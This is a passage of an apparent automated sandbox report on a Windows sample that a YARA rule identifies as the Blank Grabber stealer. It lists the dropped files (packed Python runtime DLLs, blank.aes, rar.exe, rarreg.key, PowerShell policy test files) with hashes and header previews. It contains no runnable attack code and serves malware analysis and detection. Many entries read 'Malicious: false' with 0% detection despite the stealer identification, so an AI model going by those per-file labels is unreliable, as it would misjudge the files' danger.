SHA-256:	DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
SHA-512:	C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27408
Entropy (8bit):	7.449801379195215
Encrypted:	false
SSDEEP:	384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
MD5:	513DCE65C09B3ABC516687F99A6971D8
SHA1:	8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
SHA-256:	D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
SHA-512:	621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45328
Entropy (8bit):	7.729647917060796
Encrypted:	false
SSDEEP:	768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
MD5:	14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA1:	622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
SHA-256:	A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
SHA-512:	0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60176
Entropy (8bit):	7.847943448203495
Encrypted:	false
SSDEEP:	1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
MD5:	8CD40257514A16060D5D882788855B55
SHA1:	1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
SHA-256:	7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
SHA-512:	A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68368
Entropy (8bit):	7.86108869046165
Encrypted:	false
SSDEEP:	1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:	7EF27CD65635DFBA6076771B46C1B99F
SHA1:	14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:	6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:	AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\base_library.zip

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1394456
Entropy (8bit):	5.531698507573688
Encrypted:	false
SSDEEP:	12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
MD5:	A9CBD0455B46C7D14194D1F18CA8719E
SHA1:	E1B0C30BCCD9583949C247854F617AC8A14CBAC7
SHA-256:	DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
SHA-512:	B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
Malicious:	false
Reputation:	unknown
Preview:	PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......

C:\Users\user\AppData\Local\Temp\_MEI75162\blank.aes

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	118617
Entropy (8bit):	7.69572849678117
Encrypted:	false
SSDEEP:	3072:SdbCFRk9iJ8uMzGp17i0WCzG9hWoycaCVmD:SAFRaiJxHZjOhWoyczmD
MD5:	AB05D101C69865BF1E4EE2E538B9D486
SHA1:	0C49BA8A55D618D9323FD607D8D03ED361AA99A2
SHA-256:	0FA47A1A5ACB90E9EDC24123EA46B4A7FBDB7FEBBDFADC4A0A6FE35B9C7A42BC
SHA-512:	5D87AF0EB3B46164C04BB682C6B6E43F959F69D45340E4D203D449E384DF2DEB68013829866CFC3E81927369659174B9CE7D3D74CDD09A45B9273D3BED3BA3B6
Malicious:	false
Reputation:	unknown
Preview:	PK........l.^Y..T............stub-o.pyc........]P"gL-.............................\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R...................5.......5.......r.S...r.S.r.\.".\.".\.".\.".\."./.S.Q.5.......R...................5.......5.......\."./.S.Q.5.......R...................5.......5.......".\."./.S.Q.5.......5.......R.........

C:\Users\user\AppData\Local\Temp\_MEI75162\bound.blank

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	288772
Entropy (8bit):	7.986196183522851
Encrypted:	false
SSDEEP:	6144:Pk5lwfnnLupo67jL06IhG1sfBq3A+4CXYcmdl8SojBwkwL62UwHh:M5MLt+8RJq3PXBmzOBwhdUwB
MD5:	D2ACF0D62C14BFDC8BDA1755957F3FBB
SHA1:	7D9671ECDC866462B36E11B62016FA929B405EB4
SHA-256:	A59241DC944B65D49BBC27B05B2715E0379F9D38706FBC0EEA03DC848CCCCE22
SHA-512:	8475CAD4F8DCEC54DDAB460552A564EE746542A3D450E03D972AE68B7AE3F6C545A8D856A393F9BB62090A73924389E6D7E29E0ACD4CD689C5BBC4CDDD5C0A5C
Malicious:	false
Reputation:	unknown
Preview:	..eh.......R.....;.}..R.$:.Q.Z...'.:F...H..,..."b....=#}.q......1. ....+.z..'8rXkh...waI.B..7.G....c..I.RF.a2..b]Ub.aY;S....Q...t.{h.+6...vs.'y5.V......s\.>.R ?q.c4<I.... W~.8.p..p..>....E......&..e..RX.......rj}q..WUF#...1.j%&J..$F#y.h..D.....z...S<.[Bj._ ...l.........9%..J.g..SK9.Q.....'....R......H,....W.......j..3.}<.x.~.jH..R.lj.....E....e.uU.J7.p........g`..E.c.M.JW..Q..X...lI.\.?.S..s......."......V..)8H}..'2Oo..I\|....J..3$6z..h.J..t....Jo..M.<=.&AG......L.JWT..q.F.T.y......JV........F...V..3...:.q.S.7..v....?...F.5........X.v7.2.#U.u.]....U..v3..k.edf....?]..WGz.F.F..y..2.....F..55Q..<..k{...^3.9U.?[]....{.3.3...W.3.;........T.Fk+c51..\f3Y..UG{.......aaBZ[ZD'_.]..NI..j..$.P.A.l..Z#..j..r^DE. +..R.R.\4.-1$9....W~.Z...Q.0Cf.(.y...7.....~PC...xo..H..x.Ft..g.].zY.....JhHj....D.rNt..Y.]....]]..)..q."0...Da5..s?..."1yQ.S .T..._';..S.".\|ZD.2.#E......0}..f.[:....): kW>.x......W.....`.3J..1i.F....U.ee[..]. ?.P.-."V"..mM..v

C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
SHA1:	AA483A875CB06A86A371829372980D772FDA2BF9
SHA-256:	88E8AA1C816E9F03A3B589C7028319EF456F72ADB86C9DDCA346258B6B30402D
SHA-512:	C59D0CBE8A1C64F2C18B5E2B1F49705D079A2259378A1F95F7A368415A2DC3116E0C3C731E9ABFA626D12C02B9E0D72C98C1F91A359F5486133478144FA7F5F7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29968
Entropy (8bit):	7.677818197322094
Encrypted:	false
SSDEEP:	768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
MD5:	08B000C3D990BC018FCB91A1E175E06E
SHA1:	BD0CE09BB3414D11C91316113C2BECFFF0862D0D
SHA-256:	135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
SHA-512:	8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	227096
Entropy (8bit):	7.928768674438361
Encrypted:	false
SSDEEP:	6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
MD5:	B2E766F5CF6F9D4DCBE8537BC5BDED2F
SHA1:	331269521CE1AB76799E69E9AE1C3B565A838574
SHA-256:	3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
SHA-512:	5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..\|m..\|m..\|m.u.m..\|m+.}l..\|m.u}l..\|m+..l..\|m+.xl..\|m+.yl..\|m..}l..\|m..}m..\|m..xl..\|m..\|l..\|m...m..\|m..~l..\|mRich..\|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1850640
Entropy (8bit):	7.994061638516346
Encrypted:	true
SSDEEP:	49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
MD5:	6EF5D2F77064DF6F2F47AF7EE4D44F0F
SHA1:	0003946454B107874AA31839D41EDCDA1C77B0AF
SHA-256:	AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
SHA-512:	1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	630736
Entropy (8bit):	6.409476333013752
Encrypted:	false
SSDEEP:	12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
MD5:	9C223575AE5B9544BC3D69AC6364F75E
SHA1:	8A1CB5EE02C742E937FEBC57609AC312247BA386
SHA-256:	90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
SHA-512:	57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	456
Entropy (8bit):	4.447296373872587
Encrypted:	false
SSDEEP:	12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
MD5:	4531984CAD7DACF24C086830068C4ABE
SHA1:	FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
SHA-256:	58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
SHA-512:	00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rarreg.key, Author: Joe Security
Reputation:	unknown
Preview:	RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26384
Entropy (8bit):	7.471075877103443
Encrypted:	false
SSDEEP:	384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
MD5:	FB70AECE725218D4CBA9BA9BBB779CCC
SHA1:	BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
SHA-256:	9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
SHA-512:	63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	659216
Entropy (8bit):	7.993010988331354
Encrypted:	true
SSDEEP:	12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
MD5:	21AEA45D065ECFA10AB8232F15AC78CF
SHA1:	6A754EB690FF3C7648DAE32E323B3B9589A07AF2
SHA-256:	A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
SHA-512:	D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\El9HaBFrFM.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	267024
Entropy (8bit):	7.9826656358602595
Encrypted:	false
SSDEEP:	6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
MD5:	B2712B0DD79A9DAFE60AA80265AA24C3
SHA1:	347E5AD4629AF4884959258E3893FDE92EB3C97E
SHA-256:	B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
SHA-512:	4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nzjfvod.gpu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_132ixggg.tmj.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15pwhpv4.tqx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tnqbwdb.1o2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2kxxbcoz.qjb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
